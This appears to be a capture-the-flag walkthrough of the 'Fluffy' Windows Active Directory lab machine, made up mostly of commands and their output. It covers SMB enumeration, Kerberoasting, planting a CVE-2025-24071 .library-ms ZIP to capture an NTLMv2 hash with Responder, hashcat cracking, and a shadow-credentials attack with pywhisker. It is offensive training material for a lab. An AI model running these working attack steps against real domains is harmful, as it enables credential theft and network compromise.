As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

nmap

nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 10:10 EDT
Nmap scan report for 10.10.11.69
Host is up (0.033s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-28 21:12:34Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:07+00:00; +7h00m01s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:08+00:00; +7h00m01s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-28T21:14:07+00:00; +7h00m01s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-28T21:14:08+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49700/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49729/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-28T21:13:27
|_  start_date: N/A
 
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   21.16 ms 10.10.14.1
2   28.28 ms 10.10.11.69
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds

445 smb

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares    
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share

smbclient \\\\10.10.11.69\\IT -U fluffy.htb\\j.fleischman
Password for [FLUFFY.HTB\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon May 19 10:27:02 2025
  ..                                  D        0  Mon May 19 10:27:02 2025
  Everything-1.4.1.1026.x64           D        0  Fri Apr 18 11:08:44 2025
  Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 11:04:05 2025
  KeePass-2.58                        D        0  Fri Apr 18 11:08:38 2025
  KeePass-2.58.zip                    A  3225346  Fri Apr 18 11:03:17 2025
  Upgrade_Notice.pdf                  A   169963  Sat May 17 10:31:07 2025

users

nxc smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --users 
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.69     445    DC01             Administrator                 2025-04-17 15:45:01 0       Built-in account for administering the computer/domain
SMB         10.10.11.69     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.69     445    DC01             krbtgt                        2025-04-17 16:00:02 0       Key Distribution Center Service Account
SMB         10.10.11.69     445    DC01             ca_svc                        2025-04-17 16:07:50 0        
SMB         10.10.11.69     445    DC01             ldap_svc                      2025-04-17 16:17:00 0        
SMB         10.10.11.69     445    DC01             p.agila                       2025-04-18 14:37:08 0        
SMB         10.10.11.69     445    DC01             winrm_svc                     2025-05-18 00:51:16 0        
SMB         10.10.11.69     445    DC01             j.coffey                      2025-04-19 12:09:55 0        
SMB         10.10.11.69     445    DC01             j.fleischman                  2025-05-16 14:46:55 0        
SMB         10.10.11.69     445    DC01             [*] Enumerated 9 local users: FLUFFY

bloodhound

sudo bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c all

zip -r fluffy.htb.zip *.json

kerberoasting

sudo ntpdate -u 10.10.11.69 && GetUserSPNs.py -dc-ip 10.10.11.69 fluffy.htb/j.fleischman -request-user ldap_svc
2025-05-28 17:55:57.087188 (-0400) +25199.421803 +/- 0.058239 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25199.421803
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
ServicePrincipalName  Name      MemberOf                                       PasswordLastSet             LastLogon  Delegation 
--------------------  --------  ---------------------------------------------  --------------------------  ---------  ----------
LDAP/ldap.fluffy.htb  ldap_svc  CN=Service Accounts,CN=Users,DC=fluffy,DC=htb  2025-04-17 12:17:00.599545  <never>               
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$70107bf5...$affad9d53a4e769030954a7627b069c3337e486a061ac5c229934e66ccd65a676e13a92bd167b7d40a7b849fd462f8385ff79e9fca112da2d7b7cfa0bc2425b8874932c15a7a62a673b5e78c0a387f3cee69d062fb6dff76c51afab4503ff8340b38cdac115db459d90b1a915a34df24f98494533e642ae4235fcfcbbba340ecf605bba764b8a6f685bcc0174b9a03321121372ae80a70d47a70cf1caf50902aa52ffe53a8980bba0be8a5e453cab0008d14b0d48797e3f47bcbe4bfc7aa0047f03daf06dbe2fe6ea9fe1497c7db9a906cf5c10f4d19232f5ee2db0c652fe711ac40fd566df8211c6bef902482890dcee9b5466a8fd145a4a882f19368f8e21e8d052aafdf173408d9f4e6ce66a73e593c42691c065560a0ee274878ce553d0519fc493b716d5c692288a01c562dad5a12d47b323291c592e0af12094efd3890f6706b4cbf3300b0fa0cd3736c50eeaeef55a5ca13d0d0a2bc75ed25c6e158c7948a2049577e523366b22f4f6005e77c4e4997b72ba7eb13d31a6499839e87d53c4724d0f4796a6e0a2ecd2bbbf1dfe86bc6441538f9ca0d7d15c752c7af9c1ff6a41487fe0bbb378b77ca504b1eca17887dee5b1f5e1d9dc01b419f718a6d302ba2624fb3b7e14298dc3a091f32e4d03ed78e1b5d609a35f87b4f6dc2861ef3e57feb1204b71e46d6fee2547ac685dd6a7027df9be414fb6a4f0b6e271c01c402f3b06ebdda004a209d949bbecd2637a9f40b54ee516aac768a513932485ade6073d16bd0145493a0fc62a4d4be96c66f4ac599cecf117e0f6bd1aea6fd41e136d4d49dfb6cd8fa96e602c2aca6e0df063c1a62796b998b7d9f70e613a0a84f64611b8036c13e66426efe209dddd89b83c835b75e53dc931af6583c97c3c622b5425d578614cb1339be10f269539980b91d48a03c2fb30a3eaa233b30f800d582114187e37dd5a4bf79bb55df9ad739cf4e21501042d935656ae6ea8ba0cefc9eca54c53be98100105f3dbe99367d4771e9586f710ffb7b033c9b524081dee035cd841bf23084f5bb28ec586ca562591134778424f4b86b31fbad92c07044aed179ac0b035ca89493005155cf44824f479b1976089f01d91c6d99cbdf65b09522e6522b8edf4ba6f0dd1cd69ff82c157a010a90a8614507fed82a7a83d462ff57288a036b33650d97c178f4a458cfc515019b9cc42daa548b95bf07518b2e1e6bf92fa574e8dde23d91d0e2f1d0835ded5b3fa57c6cd61976c5224cf2541f4f598c5ea47150b2693c819a2b2aaea12e449bf2bc1553db504428599769282958c88c7feeef9a4edee881a7b79538fbf176088b6a12c8b4461c01b03bc1e80c1669e3638bb6621c60ca9d4aaad4c95901652c1313e7f2cab8a12c780a169ad1b200cb3fab65f5cb8341a9d082aad32609148376b7fcd0d8cfec7d707aa92ad76a6dad20bacd9ffbfe08233c2c0af17dc7ffcd684bbee91feec41928369ce6f48335e16baed8beeaf9dc4777c0a2fc550fe7f3c93c15955cc750d6c3f351dbb5fd10403e3813a76c

ldap_svc

$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$70107bf5...$affad9d53a4e769030954a7627b069c3337e486a061ac5c229934e66ccd65a676e13a92bd167b7d40a7b849fd462f8385ff79e9fca112da2d7b7cfa0bc2425b8874932c15a7a62a673b5e78c0a387f3cee69d062fb6dff76c51afab4503ff8340b38cdac115db459d90b1a915a34df24f98494533e642ae4235fcfcbbba340ecf605bba764b8a6f685bcc0174b9a03321121372ae80a70d47a70cf1caf50902aa52ffe53a8980bba0be8a5e453cab0008d14b0d48797e3f47bcbe4bfc7aa0047f03daf06dbe2fe6ea9fe1497c7db9a906cf5c10f4d19232f5ee2db0c652fe711ac40fd566df8211c6bef902482890dcee9b5466a8fd145a4a882f19368f8e21e8d052aafdf173408d9f4e6ce66a73e593c42691c065560a0ee274878ce553d0519fc493b716d5c692288a01c562dad5a12d47b323291c592e0af12094efd3890f6706b4cbf3300b0fa0cd3736c50eeaeef55a5ca13d0d0a2bc75ed25c6e158c7948a2049577e523366b22f4f6005e77c4e4997b72ba7eb13d31a6499839e87d53c4724d0f4796a6e0a2ecd2bbbf1dfe86bc6441538f9ca0d7d15c752c7af9c1ff6a41487fe0bbb378b77ca504b1eca17887dee5b1f5e1d9dc01b419f718a6d302ba2624fb3b7e14298dc3a091f32e4d03ed78e1b5d609a35f87b4f6dc2861ef3e57feb1204b71e46d6fee2547ac685dd6a7027df9be414fb6a4f0b6e271c01c402f3b06ebdda004a209d949bbecd2637a9f40b54ee516aac768a513932485ade6073d16bd0145493a0fc62a4d4be96c66f4ac599cecf117e0f6bd1aea6fd41e136d4d49dfb6cd8fa96e602c2aca6e0df063c1a62796b998b7d9f70e613a0a84f64611b8036c13e66426efe209dddd89b83c835b75e53dc931af6583c97c3c622b5425d578614cb1339be10f269539980b91d48a03c2fb30a3eaa233b30f800d582114187e37dd5a4bf79bb55df9ad739cf4e21501042d935656ae6ea8ba0cefc9eca54c53be98100105f3dbe99367d4771e9586f710ffb7b033c9b524081dee035cd841bf23084f5bb28ec586ca562591134778424f4b86b31fbad92c07044aed179ac0b035ca89493005155cf44824f479b1976089f01d91c6d99cbdf65b09522e6522b8edf4ba6f0dd1cd69ff82c157a010a90a8614507fed82a7a83d462ff57288a036b33650d97c178f4a458cfc515019b9cc42daa548b95bf07518b2e1e6bf92fa574e8dde23d91d0e2f1d0835ded5b3fa57c6cd61976c5224cf2541f4f598c5ea47150b2693c819a2b2aaea12e449bf2bc1553db504428599769282958c88c7feeef9a4edee881a7b79538fbf176088b6a12c8b4461c01b03bc1e80c1669e3638bb6621c60ca9d4aaad4c95901652c1313e7f2cab8a12c780a169ad1b200cb3fab65f5cb8341a9d082aad32609148376b7fcd0d8cfec7d707aa92ad76a6dad20bacd9ffbfe08233c2c0af17dc7ffcd684bbee91feec41928369ce6f48335e16baed8beeaf9dc4777c0a2fc550fe7f3c93c15955cc750d6c3f351dbb5fd10403e3813a76c

smb: \> get Upgrade_Notice.pdf

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability

overview: NSFOCUS CERT has detected that Microsoft recently released a security update to address a critical spoofing vulnerability in Windows File Explorer, identified as CVE-2025-24071. This vulnerability has a CVSS score of 7.5, indicating its severity. The issue arises from the implicit trust and automatic file parsing behavior of .library-ms files in Windows Explorer. An unauthenticated attacker can exploit this vulnerability by constructing RAR/ZIP files containing a malicious SMB path. Upon decompression, this triggers an SMB authentication request, potentially exposing the user's NTLM hash. PoC (Proof of Concept) exploits for this vulnerability are now publicly available, making it a current threat. Affected users are strongly advised to apply the patch immediately to mitigate the risk.

https://github.com/ThemeHackers/CVE-2025-24071

git clone https://github.com/ThemeHackers/CVE-2025-24071.git

python3 exploit.py -f exploit -i 10.10.14.3
 
          ______ ____    ____  _______       ___     ___    ___    _____        ___    _  _      ___    ______   __  
         /      |\   \  /   / |   ____|     |__ \   / _ \  |__ \  | ____|      |__ \  | || |    / _ \  |____  | /_ | 
        |  ,----' \   \/   /  |  |__    ______ ) | | | | |    ) | | |__    ______ ) | | || |_  | | | |     / /   | | 
        |  |       \      /   |   __|  |______/ /  | | | |   / /  |___ \  |______/ /  |__   _| | | | |    / /    | | 
        |  `----.   \    /    |  |____       / /_  | |_| |  / /_   ___) |       / /_     | |   | |_| |   / /     | | 
         \______|    \__/     |_______|     |____|  \___/  |____| |____/       |____|    |_|    \___/   /_/      |_| 
                                                
                                                
                                                Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
                    by ThemeHackers                                                                                                                                                           
    
Creating exploit with filename: test.library-ms
Target IP: 10.10.11.69
 
Generating library file...
✓ Library file created successfully
 
Creating ZIP archive...
✓ ZIP file created successfully
 
Cleaning up temporary files...
✓ Cleanup completed
 
Process completed successfully!
Output file: exploit.zip
Run this file on the victim machine and you will see the effects of the vulnerability such as using ftp smb to send files etc.

smbclient \\\\10.10.11.69\\IT -U fluffy.htb\\j.fleischman

smb: \> put exploit.zip

responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
 
           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
 
 
[+] Listening for events...
 
[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:08e3d40acb0bc8fc:2BC59AB380E1241CD5A05F6E45CFF8D7:010100000000000000D59572D4CFDB01F870F189B79014B3000000000200080049004E005200370001001E00570049004E002D00310055003600490051005A0039004A0033004300320004003400570049004E002D00310055003600490051005A0039004A003300430032002E0049004E00520037002E004C004F00430041004C000300140049004E00520037002E004C004F00430041004C000500140049004E00520037002E004C004F00430041004C000700080000D59572D4CFDB0106000400020000000800300030000000000000000100000000200000B9449131C7CF3DA36072C25E61756CFE232466EF305B47C6F81C5793FA087D240A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0033000000000000000000

p.agila_ntlmv2.txt

p.agila::FLUFFY:08e3d40acb0bc8fc:2BC59AB380E1241CD5A05F6E45CFF8D7:010100000000000000D59572D4CFDB01F870F189B79014B3000000000200080049004E005200370001001E00570049004E002D00310055003600490051005A0039004A0033004300320004003400570049004E002D00310055003600490051005A0039004A003300430032002E0049004E00520037002E004C004F00430041004C000300140049004E00520037002E004C004F00430041004C000500140049004E00520037002E004C004F00430041004C000700080000D59572D4CFDB0106000400020000000800300030000000000000000100000000200000B9449131C7CF3DA36072C25E61756CFE232466EF305B47C6F81C5793FA087D240A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0033000000000000000000

hashcat -m 5600 p.agila_ntlmv2.txt /usr/share/wordlists/rockyou.txt
 
hashcat (v6.2.6-851-g6716447df) starting
 
OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 6939/13942 MB (2048 MB allocatable), 6MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Temperature abort trigger set to 90c
 
Host memory required for this attack: 1 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
P.AGILA::FLUFFY:08e3d40acb0bc8fc:2bc59ab3...:010100000000000000d59572d4cfdb01f870f189b79014b3000000000200080049004e005200370001001e00570049004e002d00310055003600490051005a0039004a0033004300320004003400570049004e002d00310055003600490051005a0039004a003300430032002e0049004e00520037002e004c004f00430041004c000300140049004e00520037002e004c004f00430041004c000500140049004e00520037002e004c004f00430041004c000700080000d59572d4cfdb0106000400020000000800300030000000000000000100000000200000b9449131c7cf3da36072c25e61756cfe232466ef305b47c6f81c5793fa087d240a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0033000000000000000000:prometheusx-303

creds

p.agila:prometheusx-303

net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.10.11.69"

net rpc group members "SERVICE ACCOUNTS" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.10.11.69" 
FLUFFY\ca_svc
FLUFFY\ldap_svc
FLUFFY\p.agila
FLUFFY\winrm_svc

sudo ntpdate fluffy.htb && python3 /opt/linux/targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303'
2025-05-28 21:03:34.481573 (-0400) +25201.149369 +/- 0.009700 fluffy.htb 10.10.11.69 s1 no-leap
CLOCK: time stepped by 25201.149369
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ca_svc)
$krb5tgs$23$*ca_svc$FLUFFY.HTB$fluffy.htb/ca_svc*$24423113...$652cbdaf683cad62559ea9f37cf921b556b22e619ad607161626f51119efcaa50daf1839d45cc431bfba66b6386b2899ca68c331834abc4a05f5ffdfd557189ddac2674689bee91668ec02fa21fda56e100e14f0a0571281d959b2f5fc1be08ec282aaaef4f01c7ec65ef651963d4ef319763df6b54ca433fd97ba764a06ef3a6d44f10a3b8cf3d5fef66cb89bb4109fd1d2c56b28d4cb99e374c452c84596145fd2a63e83343cade04b72f62254e2ab38e862e658f2a24869c8115dd4cb57eb80ec3980d67027a272213583cf4963b6a0bfc38ed505925f7390c8a1eb13f0a431a4041fc6b935643f67d47a497ebfbe96d7b113241a22b3126b0e47c6c33e0a1a929f1979aa9ade57e0b755cc79a09ad62afcc5f6283ea13cd473fe3653e7dc7c38dac67dce0dfdd849666d82a29328c0826b5abbbb4facc56a7aa925a0ac1f9b21ff2fa610a05248444d7902df70b3241ae23ccb186926bb4b646bc1db25d577f24808c04c9758f34884028cc59143af2978722f08210dd1eec55106bce1c61e57faabb05a716524e9af4b6a862ade7d0c872d74dfc621f60e4960b206a511af09e708dacb189d3dced6cc181dc2fd821348f4506bb81cb5ec847fb8a0765cad91853b48d1965439461f9de049a09156ec5a6cb22bd4f21d425e181edd86a3acadb8d30dd6566fd9016a19023e8a4e98eba1d6ac19d2ce9bddb043dc39bbd793acf54537b7470e51ccaa2930385b3c2cbf80942c4d18f09e6d42d52119e5145e39f483fab187bfb6c631d23e66000496f70b1b885bcedf3e79f5faba737784c8a6986ad41f4e44dc6ec3f283f37c8dfe589c8eafc322e82eebdb742ca473fa497737ba5cd606f5985d4ea52c836ca9125dfb8fd4a91f0ff7dc70173cb3e289dda025ead85bb765f70cda2374193f4b24f41af42abb2887fd1229ed699c7a4e935eda775e4246e693fe76b6db9e0b5abd4e0b534bc8d9782e29e8535c2656768db272791b67a7b4399f50a760d9c30e2b97b49cdcd33c47a8662d0dc47ed16107512f0e3f693b7d8e00822efd5e23ab021d1987fe42aa2f41fe6b03975376701e4e3a23dedbee1acb262f3bdb211257e1452dd90ae3f3039d1b0e1ddd98223baf64ec1135f1585ff568b1660c4d7abafb74957b3202b370b4a979728ec6c9bbb869d8af8e8c2377a4057e1e149f620af17c95735a8868ca4e6698090e7510747d5b3673c9d197f52697fa8812864bda759e2e515bee0a816e3047c410501ee298d4e59cfe9eff19a358a5ec986d593e94aba9498d7753456b8a5e3c51706dda404a9fbae518ac9b9836d7376c3145a6dcc5d04e289f212b7cbcc0317521ee5ad235167ba91e27ae4fedda9854dfd443e61222b1e445bbc2a4bd0db2769f58a257e5aa597d449bd41c9620fe4903daa1dc7b8e5e2fc3196755685be318ba99d2e058cc3ee6ab51484fefedaab7abdeed573b9a56dbe6d5b156545f28a186bb39be524a60a1c3bcc78ebf
[+] Printing hash for (ldap_svc)
$krb5tgs$23$*ldap_svc$FLUFFY.HTB$fluffy.htb/ldap_svc*$16994c2a...$67630fc637409363a9de0b6d19272f718d10d33cb0bd086b2ae9f76d32510d470f3f0963a228a4404d969a2d771cda512c5856e1044345ec57098167a3fab910935a7ca7af6c6ab413d5474778e3fdb96a5659e7907204f2d68a95f2ce7f476210cf85c91bc672db534292933ca7a5323bc9d12ed3f5ea9d649e48ae7c1cf6be71acb05742a857b3a4bb174e448f87246ea56820bfa0b2a364b80a97c9b52fd99d837e2bdcdaaeef886ce5bbade49313e907e8858b1256deff5e7f243e9696158bbeabe667b0b2031ec9346f812aaca9461a2b0404145b67ad82bf06dba9539c1cf198039c4e2b8213679a043edd42ea27c7be9484d5dffef64e29d66a41711f920a5722bc3ba7a17ba7787ec22d358ab046f5878ee8b84be10b93aa5f1d184d002f9552895fea2d3df0f33f8ca74fd4ca82822d5e2789f9ddbfb094ac27f2b47ab578721a0fbb97f0c444c72b804fe82624506fbbe389a7c74eec55c3685db18dcc17da1b042dea48473f8c268e4e4a8a24b4caf8dc78830652812b1c5824140499989af5880dd0514b76170aab27309397d4e03dbbe2e8726806dbe1134246ed0f98c3441df581ed0cf62977470a18e3f11a19ec57c55af9dc0d6b6ed0f903d33d4b40177eaa9aa35cec98282afc49f25e4a621937796e1341f3244358d3bdfb104d11d56d206f05d040ac844146aa7da736d912b4140b95222a403672a50269731f1748d0be2a81880a56b2c19286efb87652a223ea569f8489c96e086e1ae0efb21e044fe21ffaf57bda18e7e33fddc760a60fb8b66064876f003f988708a6f99dd2ad6125644fb01587dd2afb0ef22a3487ad922443e9f75f6e7f909cfa9f618e09e3501fe1730e24a5119172fb20a1c2873d547a9ffdf03355d10f8bee263806a82512b6792cef038f38f01422a06accbcb00e7915726b379b6101e1d1a638e60c1c00e9f7c2fb4ee3d1b53fa8a12cf6a3a227bdfba0584f6bf4f3c6d110c3faf16cb639b2e30580acc1e02f95a62769ece0efa898be7cef46c4f2f99ea6c104c936dc4ea2690566fef7e91037337c2963a7d8a0712d6411ed64a6fcb8cec50b213cc1465accadba97739d737bc9a2a6f34ea896a2f67b12a4edff195035e85aa81b1431ea61538ff202004c8791baa916fdbe9eeee95f36a58ace161c339bc0d35dc5e13d28e273c8ad16e8858ece5cd6f89ba20d8438f9b06abed3d85e20f1accc70fd4d4b421a1a2921385640b4d2e3150825f5d78644cd70e2c640d5c84576cb46ac31f1b72b0ca6198b9d5d58f32832e5ecf870605f9b96be6372923a5136a5832cd9377a9e6aac889bb77bf0515bfef2d5871150a953958449ddce61e87b2adc3c1b4c558111efa359b14e275c70f9fa8f65910b6bfd609e140e6bece14d8383db061fda1dd52b9404653d95a46ca66921571d2e5ded16e41cbf510c400bcd973afcbb2be844527e46162031543873ad6d70ec6a0aae9eae1bd3ec8b6fad71405c96b67a
[+] Printing hash for (winrm_svc)
$krb5tgs$23$*winrm_svc$FLUFFY.HTB$fluffy.htb/winrm_svc*$673ed5b9...$c8b8713be56857f86811a349df44f184f5a3911c3ed36b0d9615ceb3f404c8e878e9fa9de2f09e6aedbfed8c959c282cfd3747d9abbe82a93dbaed431c0c3ae23d819b34873d8e10d84c2f2e98dbb23f77b4c9f138151a60f4c47f47fe5eba1dca6942fda967a7c06c941a05ad2739b276f3e6a3fba81ff0c147a6cf5cda0a55c484f34f121e3abf3f68622ed1b89277abeee7c161cf322f48af7c6b2fb2f55094f0ec33cc50bd2b02241448dc342021243a547788804b8f468ee86aef447e893202c2762e9e539b9ecc34d54488a3321f34b72dff448379142eed2ebfb049ff42e9265fc2947f0fe1b56b80fd7d2922b5c07b148fc8ea253242dcff86e139459edb3ad49257a22535913dc695819c06e0bff957cf4a474baf00d348bb8960f98bf635b81773a34863e3b7fb86e5f27ef896bf453705f9e3b2926b9b1bc490141f97bb0151dfe70074d3da680c7074842ec1f9b00f06ee1e9dadf3ef9fb71297ca5a674f41d0c96ac9bba6dd5825fbae763f37871603671d9ba4656c73061d157a28ac536931420ee787a615f18857f055c1110f922cc9de1a65db027c38c16decb8aa923292e1558bc8ac0c1f55f81bcfdf241c2cefe0c5b84b2b981b413e68697da6e54d4def546f968bcd0f95f6d13b085ba3643fe5b6edd7e19e27cbe2e7d1de76e44fe6e620dcf6508de18d8beb411a5f38c21b27e012dd9e2f2f0b65c07bb2aad5a61250cbcd3e3b93387a09d349da31a419f0d1612f898be3f96755c874339828bb2d5dde76c753c2e70b4c4f6c7dc8656950f4b1684c9cb6d26673eddbc7b35d73ab95da590c8f4384f7a0548c4b70745a304f8daa3fa3ea283e1346020044263a99780250fb4dbd38fef211988dcd75cb9f783bc657fddd2192b87341194ae8d377cd42366d801d588a28141b0bb1758a35247c98424e0971782ab91bf63e3b1643ebe2aef00646c5e0c28abc9edce80b7d1cfa8049c3297b75944ee673791fb4416c3f6543d022ad589fb62fa416f5de1c85733967e0072fb6a360a6986c1d1788266949510e8251a41bbcc58984db44a9f228880562ba3ecab97fb3505a68c47617856bfebf8109a28473847c9e99a426c6625b2bb712ba17390da67cb5e311edbb5c44db89168a451e6f203f256e55b51ed153eade0e02eda3e4cf2be405d46ee8ce37e4e26ec07ce1f285bd7a2a0b815cc807c07fbb6d1522abd0491b38cbc5b25cea64425f049617f97ab2ac4fedf9ee2f96a2b83eaca137532a95d8ffc0ce41bbc1ac4f7d2a2a0816b77ec994764f746faece58595aa41cff16e269077bde6d5933f928b4b1a8ca7429dcdfb4d33858d816e73cbf78cb3c5bad33993518e7d62cd09a11c38eff0eea78cbe44b670b8003a26937387d5f97c97e8e92fe7f779d9596d0fd2afd44892b79de90b1bfcce6f36a60ca69792ab3eefcec8c7a9014b1032094a69b5323d9d0e58a1e544a346577f8affc44292316f79ac65c6274ab5e8e23bd

run bloodhound with p.agila creds and added to the SERVICE ACCOUNTS group and upload to bloodhound for analysis

sudo bloodhound-python -u 'p.agila' -p 'prometheusx-303' -ns 10.10.11.69 -d fluffy.htb -c all

zip -r fluffy2.htb.zip *.json

shadow credentials because of generic write

pywhisker -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action add

pywhisker -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6fc43ad4-f4d0-bf16-88f4-257618ed6e5d
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: a0nK13DR.pfx
[*] Must be used with password: a3PTZIxrbeqHVU9k1LTN
